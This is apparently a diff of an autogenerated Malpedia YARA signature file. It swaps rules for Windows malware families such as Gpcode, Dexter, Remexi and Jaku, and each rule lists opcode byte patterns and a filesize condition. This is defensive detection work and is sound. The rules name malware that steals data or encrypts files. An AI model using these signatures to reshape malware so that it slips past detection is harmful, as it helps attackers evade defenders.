+		$sequence_52 = { 0f8431ffffff 8b4d08 5f 8931 }
+		$sequence_53 = { 05a2000000 50 8d94249c0d0000 68???????? }
+		$sequence_54 = { 85c0 740a b8050000c0 e9???????? }
+		$sequence_55 = { 668cc8 c3 53 50 }
+		$sequence_56 = { c745d000000000 c745d400000000 8d45c0 50 e8???????? }
 
 	condition:
-		7 of them and filesize < 679936
+		7 of them and filesize < 1368064
 }
-rule MALPEDIA_Win_Orangeade_Auto : FILE
+rule MALPEDIA_Win_Gpcode_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a790e493-320f-57de-9b62-d13796c94676"
+		id = "2b18987b-bc80-5fc9-83bb-027c69a960bd"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.orangeade"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.orangeade_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gpcode"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gpcode_auto.yar#L1-L176"
 		license_url = "N/A"
-		logic_hash = "bc9cfd6680cc4f32cd41e9edf43afa43b54975c598906df96ea95e31fa6c1612"
+		logic_hash = "05e954eda4e4590590475795b2183e3631e7aeea469ee6afc7d69c80e137d118"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -138500,32 +138199,40 @@ rule MALPEDIA_Win_Orangeade_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bb42428050000 50 8bce e8???????? c744241001000000 }
-		$sequence_1 = { 50 8d942470020000 51 52 ff15???????? }
-		$sequence_2 = { f3ab 66ab aa 8d842468020000 50 }
-		$sequence_3 = { 6881000000 6a00 c784249428010000000000 ff15???????? 8bf0 56 }
-		$sequence_4 = { aa b93f000000 33c0 8dbc2465010000 }
-		$sequence_5 = { 8d4c2424 c684248828010002 e8???????? 8d4c2410 c684248828010001 e8???????? 8d4c2414 }
-		$sequence_6 = { b93f000000 33c0 8d7c2479 885c2478 f3ab }
-		$sequence_7 = { 68???????? 8d4c2410 e8???????? 68???????? 6884000000 53 ff15???????? }
-		$sequence_8 = { e8???????? 83c404 8d4c2424 c684248828010002 }
-		$sequence_9 = { 50 8d4c2410 c684248400000001 e8???????? }
+		$sequence_0 = { a1???????? a3???????? 6800001000 68???????? ff35???????? }
+		$sequence_1 = { 68???????? e8???????? 91 6a00 }
+		$sequence_2 = { e8???????? e8???????? c705????????01000000 c3 55 8bec }
+		$sequence_3 = { 68f4010000 e8???????? 833d????????01 75ed e8???????? }
+		$sequence_4 = { 0f840d020000 a3???????? 68???????? ff35???????? e8???????? 85c0 }
+		$sequence_5 = { a1???????? eb18 8b1d???????? 53 }
+		$sequence_6 = { ff7508 6aff 68???????? ff75f4 ff15???????? }
+		$sequence_7 = { e8???????? 85c0 0f8447020000 a3???????? 68???????? }
+		$sequence_8 = { 23d8 741f 80c141 880d???????? }
+		$sequence_9 = { e8???????? 6a0a 68???????? 6a00 e8???????? 0bc0 7504 }
+		$sequence_10 = { 75dc 85c9 7415 85c0 }
+		$sequence_11 = { a0???????? 2c30 a2???????? eb0a }
+		$sequence_12 = { 53 ff7508 56 50 6802010000 }
+		$sequence_13 = { e9???????? ff75f4 6a08 ff35???????? ff15???????? }
+		$sequence_14 = { 47 46 8a06 84c0 8975f4 }
+		$sequence_15 = { 8bfb 2b7df4 837decff 8955bc 8955c4 }
+		$sequence_16 = { 50 57 ff15???????? 8d45e4 50 }
+		$sequence_17 = { 740c 803f29 7507 c6020f }
 
 	condition:
-		7 of them and filesize < 139264
+		7 of them and filesize < 761856
 }
-rule MALPEDIA_Win_Logtu_Auto : FILE
+rule MALPEDIA_Win_Crosswalk_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f949c271-e440-5637-a6d2-753c8d4bcb2d"
+		id = "1076206e-4e1c-51ff-b49e-1f2c394e3af9"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.logtu"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.logtu_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crosswalk"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.crosswalk_auto.yar#L1-L165"
 		license_url = "N/A"
-		logic_hash = "2b9e09a38ca4475522d0fb0fcb3945e7a2b5d830b8dfe7602d8b21ba629f63c3"
+		logic_hash = "41379ac5fd7ea514139388720a6ee90edcc7ef23d2f29794443905502b173fda"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -138539,32 +138246,38 @@ rule MALPEDIA_Win_Logtu_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a64 6a00 ff15???????? 85c0 7509 8b45bc }
-		$sequence_1 = { ff15???????? 85c0 7509 8b45bc }
-		$sequence_2 = { ff15???????? 6a01 8bf0 8d85a4fdffff 68???????? 50 }
-		$sequence_3 = { 81ec98050000 a1???????? 33c5 8945fc 53 56 57 }
-		$sequence_4 = { 6800080000 50 8d85fcf7ffff 50 e8???????? }
-		$sequence_5 = { 50 8d85fcf7ffff 68???????? 50 e8???????? 8d85fcf7ffff }
-		$sequence_6 = { 8d8578faffff 50 8d8584faffff 50 }
-		$sequence_7 = { 8d8578faffff 50 8d8584faffff 50 8d8574faffff }
-		$sequence_8 = { 6a01 8bf0 8d85a4fdffff 68???????? 50 ff15???????? 83c40c }
-		$sequence_9 = { 68???????? 50 e8???????? 8d85fcf7ffff 6800040000 50 }
+		$sequence_0 = { 4883ec28 4885c9 7402 ffd1 }
+		$sequence_1 = { 8bc2 c1e81f 03d0 69c2890e0000 3bc8 }
+		$sequence_2 = { d3ca 03d0 4183ef01 75ef }
+		$sequence_3 = { 33f6 8d6e20 8bcd e8???????? }
+		$sequence_4 = { 458d7ee0 418bd7 ff15???????? 4821742420 }
+		$sequence_5 = { 41b88d56e68c 418bc0 f7e9 03d1 }
+		$sequence_6 = { 458bc6 33d2 488bc8 e8???????? 4533c9 }
+		$sequence_7 = { 410fbe00 49ffc0 d3ca 03d0 }
+		$sequence_8 = { c1f906 6bd730 8b0c8d808e4100 c644112800 85f6 740c 56 }
+		$sequence_9 = { 58 6bc000 c7803c88410002000000 6a04 58 6bc000 8b0d???????? }
+		$sequence_10 = { 6a00 6a00 57 56 8945f8 ff15???????? }
+		$sequence_11 = { 41 4a c60100 b8???????? c745dc0c234100 8945bc }
+		$sequence_12 = { 8945e8 8945f8 8b4508 56 be???????? c745ec24234100 57 }
+		$sequence_13 = { 7420 6bc618 57 8db880904100 57 ff15???????? }
+		$sequence_14 = { 83e03f 8bca 6bc030 c1f906 03048d808e4100 eb02 }
+		$sequence_15 = { 6bf030 03348d808e4100 837e18ff 740c }
 
 	condition:
-		7 of them and filesize < 924672
+		7 of them and filesize < 286720
 }
-rule MALPEDIA_Win_Dispenserxfs_Auto : FILE
+rule MALPEDIA_Win_Unidentified_023_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "dcad1348-3e3e-5861-ac43-e7a329125581"
+		id = "1400fef8-22ab-55d3-be00-2034b5c77506"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dispenserxfs"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dispenserxfs_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_023"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_023_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "8f86c5e67886e9169f08b08ef67943d3d51f035e4bbfcd62571f895fcd1de81c"
+		logic_hash = "967009d10509388ccde45cabcb9706cb7743d93f422192cdf1b0f418e7706b0c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -138578,34 +138291,34 @@ rule MALPEDIA_Win_Dispenserxfs_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 68???????? e8???????? 8b4c242c 83c41c 8bc1 }
-		$sequence_1 = { 58 6689854affffff 33c0 66898574ffffff 8d45cc }
-		$sequence_2 = { 75ee 83c004 0fb708 66890f }
-		$sequence_3 = { 68???????? e8???????? 59 ff75fc ff15???????? eb0d }
-		$sequence_4 = { 47 84c0 75f8 8bca 8d85f8eeffff c1e902 f3a5 }
-		$sequence_5 = { 0f84e6000000 0fb74106 50 0fb74104 50 }
-		$sequence_6 = { 57 8d45f0 8bd9 50 6860ea0000 33f6 895de4 }
-		$sequence_7 = { 0f8408010000 33f6 8bcb 894df4 663bf2 0f83f8000000 57 }
-		$sequence_8 = { 6683f802 750b 8b4c2408 e8???????? eb10 0fb6c1 50 }
-		$sequence_9 = { 89b544ffffff 89b564ffffff 89b568ffffff 89b56cffffff 89b570ffffff 89b57cffffff }
+		$sequence_0 = { b8cccccccc f3ab a1???????? 8945e4 8b0d???????? }
+		$sequence_1 = { 894df4 8a15???????? 8855f8 837d0c01 7514 8bf4 }
+		$sequence_2 = { 8855f8 837d0c01 7514 8bf4 68???????? ff15???????? }
+		$sequence_3 = { 8a15???????? 8855f8 837d0c01 7514 8bf4 }
+		$sequence_4 = { 8855f8 837d0c01 7514 8bf4 68???????? ff15???????? 3bf4 }
+		$sequence_5 = { 0909 0909 0407 0807 8d4900 4f }
+		$sequence_6 = { 68???????? ff15???????? 3bf4 e8???????? b801000000 52 8bcd }
+		$sequence_7 = { b938000000 b8cccccccc f3ab a1???????? 8945e4 8b0d???????? }
+		$sequence_8 = { 0909 0909 0909 0407 0807 8d4900 4f }
+		$sequence_9 = { 8945f0 8b0d???????? 894df4 8a15???????? 8855f8 837d0c01 }
 
 	condition:
-		7 of them and filesize < 114688
+		7 of them and filesize < 1433600
 }
-rule MALPEDIA_Win_Lorenz_Auto : FILE
+rule MALPEDIA_Win_Dexter_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3aee8adc-1b9f-5b03-9288-bb1500e950aa"
+		id = "b1377870-3c18-50e1-8895-9f4c52e3708d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lorenz"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lorenz_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dexter"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dexter_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "c80c5566415183b7ec75889797e4ddd8ca135fa83bddd748f7ac34751f1b8d91"
-		score = 60
-		quality = 45
+		logic_hash = "a43855bc8fa5d1635b94e65a3069c65413410fe093cfd7f70d80f09412658791"
+		score = 75
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -138617,32 +138330,32 @@ rule MALPEDIA_Win_Lorenz_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bec 51 894dfc 6a0c 8b4508 50 8b4dfc }
-		$sequence_1 = { 894db0 8b55b0 3b55f4 7314 8b45b0 8b4dfc 8b1481 }
-		$sequence_2 = { e8???????? 8945f8 8b55fc 833a02 753d 8b4df8 e8???????? }
-		$sequence_3 = { e8???????? 68???????? 8d4d84 51 e8???????? 8b5514 52 }
-		$sequence_4 = { 8b4dfc e8???????? 0fb6d0 85d2 7454 8b45fc 8b480c }
-		$sequence_5 = { ff15???????? 33d2 8b450c 66895004 8b4d0c 8b55f4 8911 }
-		$sequence_6 = { 8b55dc 8b02 50 8b4d08 51 8b4ddc e8???????? }
-		$sequence_7 = { 83c410 e9???????? 68???????? 8d4dbc e8???????? 8b4dec 8b11 }
-		$sequence_8 = { 6a00 68840a0000 68???????? 6a02 e8???????? 83c418 83f801 }
-		$sequence_9 = { cc 33d2 75c3 33c0 75bf 837dfc00 7408 }
+		$sequence_0 = { 6a59 ff15???????? 85c0 7414 68???????? 8b4d08 }
+		$sequence_1 = { 50 6a00 ff15???????? 68???????? 68???????? }
+		$sequence_2 = { 8b0d???????? 51 ff15???????? 8b15???????? 8955fc 8b45fc 50 }
+		$sequence_3 = { 8b45fc 50 ff15???????? 8b0d???????? 51 ff15???????? ebc6 }
+		$sequence_4 = { 83c40c 68???????? ff15???????? 6a00 6a00 6a00 6a00 }
+		$sequence_5 = { e9???????? 6a59 ff15???????? 85c0 7514 68???????? 8b4d08 }
+		$sequence_6 = { e8???????? 83c410 8b4508 50 8b4d10 }
+		$sequence_7 = { ff15???????? 6a4a 6a00 68???????? e8???????? 83c40c 6a4a }
+		$sequence_8 = { 7514 68???????? 8b5508 52 ff15???????? e9???????? }
+		$sequence_9 = { 51 6a08 8b15???????? 52 ff15???????? 8945f8 }
 
 	condition:
-		7 of them and filesize < 2254848
+		7 of them and filesize < 98304
 }
-rule MALPEDIA_Win_Purplefox_Auto : FILE
+rule MALPEDIA_Win_Remexi_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a13fd35f-ff4a-5d50-9b5d-b24cdc4536ab"
+		id = "a43f5f53-342c-554e-8dee-8b775f5bb787"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.purplefox"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.purplefox_auto.yar#L1-L381"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.remexi"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.remexi_auto.yar#L1-L285"
 		license_url = "N/A"
-		logic_hash = "19db2fd8d55e9f90545cae61363b7c1883764c9fb7fb14f78b3fa3d087d84046"
+		logic_hash = "9706deaac2e1169c2e84699b44e0890d8108f6f9e0cb051afcf90fb12b3b28d6"
 		score = 75
 		quality = 73
 		tags = "FILE"
@@ -138656,64 +138369,55 @@ rule MALPEDIA_Win_Purplefox_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b15???????? 53 8a1d???????? 6a01 8906 }
-		$sequence_1 = { 8945f4 3bc7 740d 8b7308 }
-		$sequence_2 = { c1fa05 c1e006 030495000c4100 eb05 b8???????? f6400420 }
-		$sequence_3 = { 85c0 7912 488b8d90010000 ff15???????? e9???????? 488b8d98010000 4533c9 }
-		$sequence_4 = { 8bcf e8???????? e9???????? 488d0df6200000 ff15???????? 488b3b }
-		$sequence_5 = { 6800000010 8d45f8 bf40020000 50 c745c018000000 895dc4 }
-		$sequence_6 = { 488d4e1c 33d2 41b801010000 e8???????? 4c8d546d00 4c8d1db0920000 49c1e204 }
-		$sequence_7 = { 66b8f230 8b4500 f9 f9 e9???????? }
-		$sequence_8 = { ff15???????? 488d542440 488d0dca110000 4c8bc6 ff15???????? 488d4c2440 41b001 }
-		$sequence_9 = { 57 4883ec60 48c7442440feffffff 48899c2488000000 }
-		$sequence_10 = { 8b7de8 56 8d8dacfbffff 51 8d55b0 52 }
-		$sequence_11 = { 8da42400000000 8038ff 750b 80780175 7505 385802 7409 }
-		$sequence_12 = { c9 49 3658 8a3f 3658 7642 }
-		$sequence_13 = { 4889442430 488b05???????? c644242800 488b08 ba00020000 48894c2420 }
-		$sequence_14 = { ff15???????? 8bf0 85f6 7914 56 68???????? ffd3 }
-		$sequence_15 = { ebcf 8bc6 c1f805 8b0485000c4100 83e61f c1e606 8d443004 }
-		$sequence_16 = { 35fd937dd3 43 d0f2 2f 4a 87cd }
-		$sequence_17 = { 448bc6 442bc0 488b442450 488d0d4b7e0000 488b0cc1 }
-		$sequence_18 = { 56 12581a 887ea4 3d0b3a08c2 }
-		$sequence_19 = { 83c408 6a00 51 ff15???????? 8bf0 }
-		$sequence_20 = { 51 e8???????? 83c404 8b5704 68???????? }
-		$sequence_21 = { 81e900202200 be100000c0 0f84ec020000 83e904 0f8486010000 83e904 }
-		$sequence_22 = { 3918 0f4c18 3bcb 0f8d87000000 488d3dd7b70000 ba58000000 488bcd }
-		$sequence_23 = { 9c 60 c64424043e f5 }
-		$sequence_24 = { 488b4c2470 ff15???????? 488b8d08040000 ff15???????? }
-		$sequence_25 = { 57 56 6a0b ffd3 3d040000c0 750d }
-		$sequence_26 = { 85c0 790a 8b4df8 ffd3 e9???????? }
-		$sequence_27 = { 58 773d 33f9 13c9 }
-		$sequence_28 = { e8???????? 33ff 33c0 8945f4 8945f0 8945f8 8b450c }
-		$sequence_29 = { c740e40d000000 8b55f8 8950e8 8b4660 }
-		$sequence_30 = { 488d4c2420 33d2 4889442420 8b05???????? }
-		$sequence_31 = { 4883f83c 7647 498bcd e8???????? 4c8d05436c0000 41b903000000 488d4c45bc }
-		$sequence_32 = { 488b4b08 ff15???????? c70300000000 4883c420 5b c3 }
-		$sequence_33 = { 4883c202 668941fe 6685c0 75ec 488b7e08 4883c9ff 33c0 }
-		$sequence_34 = { 4883ec20 488bd9 e8???????? 4c8d1d17a10000 }
-		$sequence_35 = { ff15???????? 4839442470 0f85b3000000 488d542460 488bce ff15???????? 85c0 }
-		$sequence_36 = { e9???????? 660fb6d1 f9 8b5504 c0c107 d2e9 }
-		$sequence_37 = { 57 f361 634cea1c bc2cedefeb 59 fb 7fab }
-		$sequence_38 = { 7506 50 e9???????? 8b55ec }
-		$sequence_39 = { 56 68???????? ff15???????? 83c408 8bc6 5e 8be5 }
+		$sequence_0 = { 56 c706ffffffff e8???????? 83c404 }
+		$sequence_1 = { 890d???????? 68???????? 41 50 a3???????? c705????????02000000 890d???????? }
+		$sequence_2 = { 68???????? 50 ff15???????? 8b0d???????? 8b35???????? 890d???????? 68???????? }
+		$sequence_3 = { 6a10 8d4ddc 8bf0 51 }
+		$sequence_4 = { 6a00 6a02 c785ccfeffff28010000 ff15???????? }
+		$sequence_5 = { 5f c3 56 ff15???????? 57 8b3d???????? }
+		$sequence_6 = { 8945e4 8945e8 b802000000 51 }
+		$sequence_7 = { 56 6824000100 50 57 ff15???????? }
+		$sequence_8 = { a3???????? c705????????02000000 890d???????? ffd6 6a00 6a00 6a00 }
+		$sequence_9 = { 6828010000 8d8dccfeffff 6a00 51 }
+		$sequence_10 = { 50 6a02 ff15???????? 6a10 8d4ddc }
+		$sequence_11 = { 7513 8b45d8 8b4818 8b5104 }
+		$sequence_12 = { 89470c 57 894710 ff15???????? 6a00 6a00 6a01 }
+		$sequence_13 = { c705????????ffffffff c705????????01000000 c705????????00000000 ffd6 83ffff }
+		$sequence_14 = { 52 6a00 68ffff1f00 ffd7 8bf0 }
+		$sequence_15 = { 015518 8b5d14 85db 0f8565fbffff }
+		$sequence_16 = { 488d542450 488d4c2420 e8???????? 488d442420 4889442440 488d542420 }
+		$sequence_17 = { 015330 41 894b0c e9???????? }
+		$sequence_18 = { 488bc3 c60000 44897320 41b901000000 488d1529f30100 488bcf }
+		$sequence_19 = { 016b24 89e8 83c44c 5b }
+		$sequence_20 = { 4898 4885c0 7515 4883fb06 7305 }
+		$sequence_21 = { 015930 3b542408 0f8d10ffffff 8d3c52 }
+		$sequence_22 = { 488bcf e8???????? 4885db 0f8428010000 48837f1810 7227 }
+		$sequence_23 = { 7468 48c74424380f000000 48897c2430 c644242000 4983c9ff }
+		$sequence_24 = { 015330 e9???????? 8b5314 3b5318 0f8d23020000 }
+		$sequence_25 = { 014b30 bf???????? b903000000 8b742418 }
+		$sequence_26 = { e8???????? 48837f1810 48895f10 7205 488b07 eb03 }
+		$sequence_27 = { c3 4053 4883ec20 488d0d73340100 ff15???????? 488d1586340100 }
+		$sequence_28 = { 015330 8a10 eb84 8a5001 }
+		$sequence_29 = { 016b04 83c41c 5b 5e }
+		$sequence_30 = { 0f8540010000 488d1583310100 488bcb e8???????? 4c8bf0 4885c0 0f8421010000 }
 
 	condition:
-		7 of them and filesize < 1983488
+		7 of them and filesize < 614400
 }
-rule MALPEDIA_Win_Jaff_Auto : FILE
+rule MALPEDIA_Win_Jaku_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e0c41ef8-0a92-555f-b34f-5db2f4589c45"
+		id = "5711a497-d28d-5b3a-91bd-62abf5157c12"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jaff"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.jaff_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jaku"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.jaku_auto.yar#L1-L277"
 		license_url = "N/A"
-		logic_hash = "6a4dc9720f78e5a6e283d3b622047ad1fb4dc38cefeb255d404c0bdb257eb37c"
+		logic_hash = "bc36249d8d7142a776a25d525229620582afb8014b8d26d03d6dad8843321c84"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -138725,32 +138429,51 @@ rule MALPEDIA_Win_Jaff_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 395604 760b 8b36 0fb73456 8975f4 }
-		$sequence_1 = { 8b55c8 33c0 8bca 85d2 7419 8b75c4 66833c4600 }
-		$sequence_2 = { 8b4de0 8b3d???????? 51 6a00 ffd7 50 }
-		$sequence_3 = { 668b144a 66891448 41 3b4e04 72f0 8b4e04 }
-		$sequence_4 = { ffd7 50 ffd3 8b7d0c 8b4f04 }
-		$sequence_5 = { 50 6a00 ffd7 50 ff15???????? 5f 8bc6 }
-		$sequence_6 = { 56 8945f8 ffd3 8945fc 83f808 7705 }
-		$sequence_7 = { 41 3b4df8 76a8 8b4d08 80790c00 740d 8b5510 }
-		$sequence_8 = { 8b4ddc 8b3d???????? 51 6a00 ffd7 50 ffd3 }
-		$sequence_9 = { 0fb70448 eb02 33c0 0fbff0 2b45f4 0fbffa 03f7 }
+		$sequence_0 = { 3945f8 0f94c0 eb02 32c0 }
+		$sequence_1 = { 8bcf 83e107 d3eb 2bf9 895df4 83ff20 }
+		$sequence_2 = { b83c800000 e8???????? 53 56 57 6a38 8d45c4 }
+		$sequence_3 = { 33db 894618 895df4 c70601000000 e9???????? 8b4620 }
+		$sequence_4 = { 83c204 8bfa d3e7 8b4e14 6609beb8160000 }
+		$sequence_5 = { 7573 8bc3 83e00f 3c08 0f85a6000000 8b4624 83ef04 }
+		$sequence_6 = { 880c07 8b02 8a4df8 884c0701 8b0a 8bc6 2bc1 }
+		$sequence_7 = { 2bf8 83c410 85ff 7fd7 5b 56 }
+		$sequence_8 = { 68???????? ff15???????? c3 b8???????? e8???????? 83ec2c }
+		$sequence_9 = { ff742408 e8???????? c20800 8bc1 }
+		$sequence_10 = { 53 68000000a0 6a03 53 }
+		$sequence_11 = { 7507 b800308000 eb02 33c0 }
+		$sequence_12 = { 7508 83c8ff e9???????? 8b839f830000 }
+		$sequence_13 = { 6a01 03c3 68???????? 50 e8???????? 83c40c }
+		$sequence_14 = { 5b c3 55 8bec 833d????????00 53 56 }
+		$sequence_15 = { 55 56 57 6880020000 }
+		$sequence_16 = { 75dd 57 e8???????? 59 }
+		$sequence_17 = { 0245fd 3245fe 8a4dff d2c8 }
+		$sequence_18 = { 50 e8???????? 59 8b4e2c }
+		$sequence_19 = { 85ff 897c240c 750c 5f 5e b801000000 5b }
+		$sequence_20 = { 56 e8???????? 59 8b4620 }
+		$sequence_21 = { e8???????? 59 eb57 53 }
+		$sequence_22 = { 016c242c 8b44242c 5f 5e 5d }
+		$sequence_23 = { 50 894528 e8???????? 83c410 8b3d???????? 53 }
+		$sequence_24 = { 53 53 53 6aff ff7528 bee9fd0000 }
+		$sequence_25 = { 56 57 8965f0 33ff 897dfc c645fc01 837d1c10 }
+		$sequence_26 = { 8bbe9b830000 33db 8d4f01 43 }
+		$sequence_27 = { 6a00 8b9580faffff 837a3000 750b 8b8db4f9ffff 83c904 eb06 }
+		$sequence_28 = { 6a00 53 56 e8???????? 83c41c 8b55f8 8345f8ff }
 
 	condition:
-		7 of them and filesize < 106496
+		7 of them and filesize < 2220032
 }
-rule MALPEDIA_Win_Sidewalk_Auto : FILE
+rule MALPEDIA_Win_Cookiebag_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "39c1c961-da91-5a25-8ecb-047f3c9eb164"
+		id = "a1b2ec8f-a75e-5a6d-8c41-80da5c8e831c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewalk"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sidewalk_auto.yar#L1-L149"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cookiebag"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cookiebag_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "8deb72ecccbb130aa5e8724fff6a194c33523f3296434270b03ff0933ff78416"
+		logic_hash = "2cb20734fcd81a355448bc2557be61a5fdc54ceb6b9b3a4d3d93ee10aa49b59c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -138764,38 +138487,34 @@ rule MALPEDIA_Win_Sidewalk_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 41c1c610 4503e6 4403cb 4533d1 4403ee 41c1c210 418bc3 }
-		$sequence_1 = { c1c010 4403d8 4133db c1c30c }
-		$sequence_2 = { ff15???????? 4885c0 750e 488bcf ff15???????? }
-		$sequence_3 = { 33f0 418bc1 4133c6 c1c608 c1c010 4403de 4403e8 }
-		$sequence_4 = { 4433f2 c1c710 4403df 41c1c610 4503e6 4403cb }
-		$sequence_5 = { c1e810 880a c1e918 884202 884a03 4183f810 }
-		$sequence_6 = { 48ffc1 488d040a 483bc6 7ce2 }
-		$sequence_7 = { 4133db c1c30c 03d3 8bf2 }
-		$sequence_8 = { 4133db 418bcd c1c307 4133c8 }
-		$sequence_9 = { 418b09 418bc0 c1e002 4d8d4904 4863d0 }
-		$sequence_10 = { 8a040f 3201 41880408 48ffc1 488d040a }
-		$sequence_11 = { c1e108 0bc8 0fb642fe c1e108 0bc8 41890c10 488d5204 }
-		$sequence_12 = { 488b05???????? 83780c00 7405 e8???????? 488b0d???????? }
-		$sequence_13 = { 89750b 4489750f 44897d03 448965ff }
+		$sequence_0 = { e8???????? bf???????? 83c9ff 33c0 c644247403 f2ae f7d1 }
+		$sequence_1 = { 83e00f eb02 33c0 0fbe84c1a0e24100 c1f804 83f807 }
+		$sequence_2 = { 2bc2 83f801 8a5cbc2c 7705 }
+		$sequence_3 = { 896c2458 896c245c 741d 8d48ff 8a40ff 84c0 740a }
+		$sequence_4 = { e9???????? 49 51 e8???????? 83c404 e9???????? 8a8c2484000000 }
+		$sequence_5 = { 47 83f80b 0f8777020000 ff248509c44100 80fb31 7c0c }
+		$sequence_6 = { e8???????? 8b4c242c 8b442428 45 83c710 e9???????? 50 }
+		$sequence_7 = { 8bd8 8dbe98000000 6a01 53 8bcf e8???????? 84c0 }
+		$sequence_8 = { 8bf8 8d9e04010000 6a01 57 8bcb e8???????? 84c0 }
+		$sequence_9 = { 889c24b8000000 e8???????? 8d44242c 8d4c241c 50 8d542460 51 }
 
 	condition:
-		7 of them and filesize < 237568
+		7 of them and filesize < 311296
 }
-rule MALPEDIA_Win_Badcall_Auto : FILE
+rule MALPEDIA_Win_Hardrain_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "233fe049-459f-50da-b51f-73303606a185"
+		id = "25398ca8-a4b7-5603-875f-04e6efbaac2b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.badcall"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.badcall_auto.yar#L1-L239"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hardrain"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hardrain_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "cbbb68fc4f4ef6dd9bf8f48d22c329386c6109c255e88f35209d20a078bb6b07"
